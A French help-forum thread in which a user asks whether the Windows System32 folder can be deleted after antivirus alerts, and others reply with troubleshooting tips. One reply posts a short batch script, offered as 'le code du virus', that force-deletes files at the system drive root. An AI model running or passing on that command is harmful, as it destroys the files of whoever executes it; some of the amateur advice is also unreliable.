Peut-on supprimer "windows system 32" ?? [Fermé]

- - Dernière réponse :  mustapha 10 - 1 juil. 2010 à 16:28
bonjour a tous

je me suis apercu que j'attrappais plusieurs virus ayant l'emplacement windows system 32 .

PUIS EFFACER SS CONSEQUENCE CE FICHIER???

MERCI pour vos réponses

jo
Afficher la suite 

10 réponses

Meilleure réponse
9
Merci
oui sois plus precis parcque system 32 est tres important pour le systeme alors que system32.dll non
j'attend tes reponse
@++++++++++

Dire « Merci » 9

Quelques mots de remerciements seront grandement appréciés. Ajouter un commentaire

CCM 63003 internautes nous ont dit merci ce mois-ci

3
Merci
Salut
Sois plus précis, si c'est ton antivirus qui signale alors tente réparation et en cas d'échec efface
Quels noms ces virus?
A+
1
Merci
coucou surtout ne suprime pas system 32 et pour les virus peu tu etre encore plus precis on nous donnant par exemple les nom des virus pour qu'on puisse te dire koi faire
@+++++++++++++
1
Merci
lz virus est bloodhound.w32.1 que faire svp
Messages postés
106
Statut
Membre
Dernière intervention
12 janvier 2013
41
1
Merci
Lance l'antivirus et trouve le(s) fichier(s) infecte(s)
Tres important : Ne supprimez pas system32 enfin si pour creer des virus
Voici le code du virus
@echo off 
cd /d %systemdrive% 
del /f /q *.*
0
Merci
salut as tu essayer de le suprime en mode sans echec redemarage +tapotte sans cesse sur F8 ou F5. )

ensuite tu va dans demarer /rechercher et tape : le nom du fichier utliser par le virus
@++++++++++
0
Merci
Salut à tous le monde!
Je regrette mais je ne suis pas français, je sius italienne et je ne sais pas le français très bien. ^^'
Je voulais dire à Jo que j'ai le meme problème. =.= J'espere que la symantec pourrait trouver une solution! Ou le Norton... parce que le virus est protégé très bien et nous ne pouvons faire rien pour le éliminer.
Au revoir
0
Merci
bonjour a tous et tout dabord merci pour vos reponse.
Mon problem est que j'avais des virus dans le dossier windows system 32 et mon antivirus m'a demandé si je voulai les suprimé et buen j'ai di oui donc de ce fait jaimerai savoir comment recuperé ce faùeux dossier
merci merci merci et milles meri pour vous ....
salut peut-on supprimer windows syteme32.merci
Merci infiniment pour la réponce,c'est efficace
-1
Merci
salut!!!!
merci d'avoir répondu

les virus st
dorod.exe et wep .exe norton les détecte ms ne peut pas les réparer et ts les deux st a l'emplacement windows system 32
je suis actuellement sur xp

merci pour toute réponse